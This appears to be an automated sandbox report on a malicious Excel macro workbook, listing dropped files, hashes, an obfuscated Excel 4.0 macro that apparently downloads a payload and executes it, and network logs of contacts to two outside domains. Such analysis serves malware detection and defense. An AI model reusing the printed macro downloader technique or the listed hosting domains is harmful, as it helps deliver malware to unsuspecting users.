                                                                            SSDEEP:3:bDesBVomxWdachXpSOytchXpSmxWdachXpSv:bSsjuaUpytUpQaUpc
                                                                            MD5:73CC729DE0553090852F1A55C9A6A09B
                                                                            SHA1:43913E320A86BD4ED4D9F76C812CCCE8B0B73A6A
                                                                            SHA-256:B60AD2B191B5D991B8F8C7FD00E4385E34DFE81495251DAD4FFC236CE16C547A
                                                                            SHA-512:50C036EF418D53A8A5F02405DA6490ED7012B62CD85146FDC2FD8D89597A675E5329A242D5DB9FDB530DA4F47923F90A8B2A388A6D741E61A0595EF85437F3ED
                                                                            Malicious:false
                                                                            Preview: [folders]..Desktop.LNK=0..[misc]..statistic-2067311372.LNK=0..statistic-2067311372.LNK=0..[misc]..statistic-2067311372.LNK=0..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\statistic-2067311372.LNK
                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:24:16 2020, mtime=Tue May 4 19:56:50 2021, atime=Tue May 4 19:56:50 2021, length=107618, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2252
                                                                            Entropy (8bit):4.703482492634008
                                                                            Encrypted:false
                                                                            SSDEEP:24:8jMm1aV1AT3WvViDQw7aB6myjMm1aV1AT3WvViDQw7aB6m:8wcHT3WrB6pwcHT3WrB6
                                                                            MD5:52EDEDC8511B70C4C87FC05727ABF755
                                                                            SHA1:B1CE849B07C3949D9D17EE6E7C35C9855B2BD6FA
                                                                            SHA-256:1497DCE66794895652E2F864C0F9B6362372958BDA45B9AC489DED4D7EBD33F7
                                                                            SHA-512:E4D3EF64BFF39295E0EE71CA521ECB9B390A6D897C1E53C3AB28D9F1655713C79CF246B3BC1B982009128B38B039409A45315366D810B5ABBAAAD78B72CA7B6D
                                                                            Malicious:false
                                                                            Preview: L..................F.... ...p...=...SaW.(A..SaW.(A..b............................P.O. .:i.....+00.../C:\...................x.1......N...Users.d......L...R......................:.......1.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....\.1.....>Q.{..user~1..D.......N...R.......S........................f.r.o.n.t.d.e.s.k.....~.1.....>Q.{..Desktop.h.......N...R.......Y..............>.......-.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .STATIS~1.XLS..d......>Q.{.R......WA........................s.t.a.t.i.s.t.i.c.-.2.0.6.7.3.1.1.3.7.2...x.l.s.m.......c...............-.......b...........>.S......C:\Users\user\Desktop\statistic-2067311372.xlsm..0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.t.a.t.i.s.t.i.c.-.2.0.6.7.3.1.1.3.7.2...x.l.s.m.........:..,.LB.)...A....`.......X.......562258...........!a..%.H.VZAj....S..0............!a..%.H.VZAj....S..0.......................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-
                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                            Category:dropped
                                                                            Size (bytes):22
                                                                            Entropy (8bit):2.9808259362290785
                                                                            Encrypted:false
                                                                            SSDEEP:3:QAlX0Gn:QKn
                                                                            MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                            SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                            SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                            SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                            Malicious:false
                                                                            Preview: ....p.r.a.t.e.s.h.....
                                                                            C:\Users\user\Desktop\BAC10000
                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):107618
                                                                            Entropy (8bit):7.9160914017595605
                                                                            Encrypted:false
                                                                            SSDEEP:1536:nmHTqPyl/yBO992hjPcQpWUot9ErjPX44sh0x13TQfDO:nl+yo9opH8x+3xs6ZQq
                                                                            MD5:46B9E48683C9667EA5A7D7F317C99F5C
                                                                            SHA1:FAF81A578491D60CBFB75ACF38642109F13C6B6B
                                                                            SHA-256:D358F70D718306136A9D3398CD799D4A21657B13ED7A4C6C9A67190E60251145
                                                                            SHA-512:950D5193701D5D3AF3B09D9F24DBA1D33330371A732624D53884BD439A0B3A0375A0CA590A86444207FA30A507D3A478EF192280EE1A1EF18CB4D3C64926240E
                                                                            Malicious:false
                                                                            Preview: .U.N.0.}G..".....j..]xd.`?....U..1.....P.*-.....s.3.^....!...e..U.W.u-.w.].d.&.0.A...rvz2._.......O)...e.V`..8.,|.".k.x.r):.......K.R.2..M..B<.T].hy.d...~o..T-.!.-E"...w$._,....%..C....H.4!jb.w.........{.m..wgD08N..CC....u.32......!./50j....FXr.....q9.~....fZ.a%.4.......s....=+..T2....'(.n.......:..A.u.|Z.....2.n<.h.U]..........>...6bZ..o.2..C............>.CE.%...x...}.4+o..H.8.x..'Y...AL...l..2.,?.....j.7/...?.......PK..........!.t...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\Desktop\~$statistic-2067311372.xlsm
                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):330
                                                                            Entropy (8bit):1.6081032063576088
                                                                            Encrypted:false
                                                                            SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                            MD5:836727206447D2C6B98C973E058460C9
                                                                            SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                            SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                            SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                            Malicious:true
                                                                            Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                            C:\Users\user\jordji.nbvt11
                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            File Type:HTML document, ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):494
                                                                            Entropy (8bit):4.962239405540505
                                                                            Encrypted:false
                                                                            SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                            MD5:0357AA49EA850B11B99D09A2479C321B
                                                                            SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                            SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                            SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                            Malicious:false
                                                                            Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.

                                                                            Static File Info

                                                                            General

                                                                            File type:Microsoft Excel 2007+
                                                                            Entropy (8bit):7.917049261986743
                                                                            TrID:
                                                                            • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                            • ZIP compressed archive (8000/1) 16.67%
                                                                            File name:statistic-2067311372.xlsm
                                                                            File size:109084
                                                                            MD5:894169c41e45975fa36c36c031628f52
                                                                            SHA1:3ad2f1b52fca973252dfba03610bf1def0c37e3c
                                                                            SHA256:69a97d83771cb6cb1583fbf95e5fb9ada26f1ee6257351ecf24b9b4e9e4d80d4
                                                                            SHA512:604e1cc0560400d17b35782c1b942332dd1c428fce24dbb5f62ab37f00594693e0ffb87b7a50749482bdba75cd0422602a3f93a8bb5e80150a3605086f34e478
                                                                            SSDEEP:1536:iutuov3BiTr4GDgM+nG92hjPcQpWUot9E8cNcrAOJOerwzkFBHhr6vQnf+zy7fc:ikuocrZDKGopH8x+8HdoLqp6vif+zUk
                                                                            File Content Preview:PK..........!.t...............[Content_Types].xml ...(............................................................................................................................................##...........................................................

                                                                            File Icon

                                                                            Icon Hash:74ecd0e2f696908c

                                                                            Static OLE Info

                                                                            General

                                                                            Document Type:OpenXML
                                                                            Number of OLE Files:1

                                                                            OLE File "statistic-2067311372.xlsm"

                                                                            Indicators

                                                                            Has Summary Info:
                                                                            Application Name:
                                                                            Encrypted Document:
                                                                            Contains Word Document Stream:
                                                                            Contains Workbook/Book Stream:
                                                                            Contains PowerPoint Document Stream:
                                                                            Contains Visio Document Stream:
                                                                            Contains ObjectPool Stream:
                                                                            Flash Objects Count:
                                                                            Contains VBA Macros:

                                                                            Macro 4.0 Code

                                                                            ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                            ,,,=HALT(),,,,,,,,,,,,"=4984654+9846544+468464=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT114,before.3.21.42.sheet!AT39,0,0)=CALL(Sheet2!AY107&""n"",Sheet2!AY108&""A"",Sheet2!AY118,before.3.21.42.sheet!AR49,Sheet2!AT115,before.3.21.42.sheet!AT39&""1"",0,0)",,,,,,,,,,,,,,,=Sheet2!AW142(),,,,,,,,,,,,,,,,,,,,,U,J,",D",..\jordji.nbvt1R,J,l,L,C,l,D,C,R,o,B,e,w,B,g,n,,i,l,,s,o,,t,a,,e,d,0,r,T,,S,o,,e,F,,r,i,,ve,l,,r,e,,,

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            May 4, 2021 13:56:52.231123924 CEST49690443192.168.2.7192.254.233.89
                                                                            May 4, 2021 13:56:52.416086912 CEST44349690192.254.233.89192.168.2.7
                                                                            May 4, 2021 13:56:52.416256905 CEST49690443192.168.2.7192.254.233.89
                                                                            May 4, 2021 13:56:52.435971975 CEST49690443192.168.2.7192.254.233.89
                                                                            May 4, 2021 13:56:52.622965097 CEST44349690192.254.233.89192.168.2.7
                                                                            May 4, 2021 13:56:52.623292923 CEST44349690192.254.233.89192.168.2.7
                                                                            May 4, 2021 13:56:52.623322964 CEST44349690192.254.233.89192.168.2.7
                                                                            May 4, 2021 13:56:52.623342991 CEST44349690192.254.233.89192.168.2.7
                                                                            May 4, 2021 13:56:52.623405933 CEST49690443192.168.2.7192.254.233.89
                                                                            May 4, 2021 13:56:52.623451948 CEST49690443192.168.2.7192.254.233.89
                                                                            May 4, 2021 13:56:52.675903082 CEST49690443192.168.2.7192.254.233.89
                                                                            May 4, 2021 13:56:52.861830950 CEST44349690192.254.233.89192.168.2.7
                                                                            May 4, 2021 13:56:52.862066031 CEST49690443192.168.2.7192.254.233.89
                                                                            May 4, 2021 13:56:52.875065088 CEST49690443192.168.2.7192.254.233.89
                                                                            May 4, 2021 13:56:53.102150917 CEST44349690192.254.233.89192.168.2.7
                                                                            May 4, 2021 13:56:53.406948090 CEST44349690192.254.233.89192.168.2.7
                                                                            May 4, 2021 13:56:53.407116890 CEST49690443192.168.2.7192.254.233.89
                                                                            May 4, 2021 13:56:53.407347918 CEST44349690192.254.233.89192.168.2.7
                                                                            May 4, 2021 13:56:53.407413006 CEST49690443192.168.2.7192.254.233.89
                                                                            May 4, 2021 13:56:53.408818960 CEST49690443192.168.2.7192.254.233.89
                                                                            May 4, 2021 13:56:53.594676971 CEST44349690192.254.233.89192.168.2.7
                                                                            May 4, 2021 13:56:53.616178989 CEST49692443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:53.778755903 CEST44349692192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:53.778902054 CEST49692443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:53.779459000 CEST49692443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:53.941581964 CEST44349692192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:53.945427895 CEST44349692192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:53.945446968 CEST44349692192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:53.945460081 CEST44349692192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:53.945552111 CEST49692443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:53.945611000 CEST49692443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:53.954619884 CEST49692443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:54.117275000 CEST44349692192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:54.117496967 CEST49692443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:54.118757010 CEST49692443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:54.291460991 CEST44349692192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:54.291578054 CEST44349692192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:54.291644096 CEST49692443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:54.291687965 CEST49692443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:54.293279886 CEST49692443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:54.296905994 CEST49693443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:54.455378056 CEST44349692192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:54.459826946 CEST44349693192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:54.459928036 CEST49693443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:54.461150885 CEST49693443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:54.624006033 CEST44349693192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:54.625125885 CEST44349693192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:54.625205040 CEST49693443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:54.626096964 CEST49693443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:54.629156113 CEST49693443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:54.801234961 CEST44349693192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:55.059995890 CEST44349693192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:55.060102940 CEST49693443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:56:55.060836077 CEST44349693192.185.5.2192.168.2.7
                                                                            May 4, 2021 13:56:55.060908079 CEST49693443192.168.2.7192.185.5.2
                                                                            May 4, 2021 13:57:25.060967922 CEST44349693192.185.5.2192.168.2.7

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            May 4, 2021 13:56:35.455034018 CEST6335453192.168.2.78.8.8.8
                                                                            May 4, 2021 13:56:35.503837109 CEST53633548.8.8.8192.168.2.7
                                                                            May 4, 2021 13:56:37.746665955 CEST5312953192.168.2.78.8.8.8
                                                                            May 4, 2021 13:56:37.796993017 CEST53531298.8.8.8192.168.2.7
                                                                            May 4, 2021 13:56:40.966309071 CEST6245253192.168.2.78.8.8.8
                                                                            May 4, 2021 13:56:41.018373966 CEST53624528.8.8.8192.168.2.7
                                                                            May 4, 2021 13:56:45.718420029 CEST5782053192.168.2.78.8.8.8
                                                                            May 4, 2021 13:56:45.767061949 CEST53578208.8.8.8192.168.2.7
                                                                            May 4, 2021 13:56:47.959892035 CEST5084853192.168.2.78.8.8.8
                                                                            May 4, 2021 13:56:48.008582115 CEST53508488.8.8.8192.168.2.7
                                                                            May 4, 2021 13:56:52.157201052 CEST6124253192.168.2.78.8.8.8
                                                                            May 4, 2021 13:56:52.177794933 CEST5856253192.168.2.78.8.8.8
                                                                            May 4, 2021 13:56:52.215709925 CEST53612428.8.8.8192.168.2.7
                                                                            May 4, 2021 13:56:52.228308916 CEST53585628.8.8.8192.168.2.7
                                                                            May 4, 2021 13:56:53.026015043 CEST5659053192.168.2.78.8.8.8
                                                                            May 4, 2021 13:56:53.082946062 CEST53565908.8.8.8192.168.2.7
                                                                            May 4, 2021 13:56:53.425842047 CEST6050153192.168.2.78.8.8.8
                                                                            May 4, 2021 13:56:53.613508940 CEST53605018.8.8.8192.168.2.7
                                                                            May 4, 2021 13:56:54.358654022 CEST5377553192.168.2.78.8.8.8
                                                                            May 4, 2021 13:56:54.407346964 CEST53537758.8.8.8192.168.2.7
                                                                            May 4, 2021 13:56:55.810096979 CEST5183753192.168.2.78.8.8.8
                                                                            May 4, 2021 13:56:55.861625910 CEST53518378.8.8.8192.168.2.7
                                                                            May 4, 2021 13:56:57.016010046 CEST5541153192.168.2.78.8.8.8
                                                                            May 4, 2021 13:56:57.096023083 CEST53554118.8.8.8192.168.2.7
                                                                            May 4, 2021 13:56:58.000493050 CEST6366853192.168.2.78.8.8.8
                                                                            May 4, 2021 13:56:58.072906971 CEST53636688.8.8.8192.168.2.7
                                                                            May 4, 2021 13:57:01.726914883 CEST5464053192.168.2.78.8.8.8
                                                                            May 4, 2021 13:57:01.775646925 CEST53546408.8.8.8192.168.2.7
                                                                            May 4, 2021 13:57:03.358119011 CEST5873953192.168.2.78.8.8.8
                                                                            May 4, 2021 13:57:03.408268929 CEST53587398.8.8.8192.168.2.7
                                                                            May 4, 2021 13:57:04.668370008 CEST6033853192.168.2.78.8.8.8
                                                                            May 4, 2021 13:57:04.719921112 CEST53603388.8.8.8192.168.2.7
                                                                            May 4, 2021 13:57:05.592653990 CEST5871753192.168.2.78.8.8.8
                                                                            May 4, 2021 13:57:05.646223068 CEST53587178.8.8.8192.168.2.7
                                                                            May 4, 2021 13:57:06.556112051 CEST5976253192.168.2.78.8.8.8
                                                                            May 4, 2021 13:57:06.605031013 CEST53597628.8.8.8192.168.2.7
                                                                            May 4, 2021 13:57:07.583998919 CEST5432953192.168.2.78.8.8.8
                                                                            May 4, 2021 13:57:07.632932901 CEST53543298.8.8.8192.168.2.7
                                                                            May 4, 2021 13:57:08.851629972 CEST5805253192.168.2.78.8.8.8
                                                                            May 4, 2021 13:57:08.901520967 CEST53580528.8.8.8192.168.2.7
                                                                            May 4, 2021 13:57:09.849986076 CEST5400853192.168.2.78.8.8.8
                                                                            May 4, 2021 13:57:09.899063110 CEST53540088.8.8.8192.168.2.7
                                                                            May 4, 2021 13:57:29.728487968 CEST5945153192.168.2.78.8.8.8
                                                                            May 4, 2021 13:57:29.805799961 CEST53594518.8.8.8192.168.2.7

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            May 4, 2021 13:56:52.157201052 CEST192.168.2.78.8.8.80xc195Standard query (0)industrialarttextile.comA (IP address)IN (0x0001)
                                                                            May 4, 2021 13:56:53.425842047 CEST192.168.2.78.8.8.80x8c75Standard query (0)anaheimdermatologists.comA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            May 4, 2021 13:56:52.215709925 CEST8.8.8.8192.168.2.70xc195No error (0)industrialarttextile.com192.254.233.89A (IP address)IN (0x0001)
                                                                            May 4, 2021 13:56:53.613508940 CEST8.8.8.8192.168.2.70x8c75No error (0)anaheimdermatologists.com192.185.5.2A (IP address)IN (0x0001)

                                                                            HTTPS Packets

                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                            May 4, 2021 13:56:52.623342991 CEST192.254.233.89443192.168.2.749690CN=mail.gdmart.com.bd CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 10 10:47:11 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 08 11:47:11 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                            CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
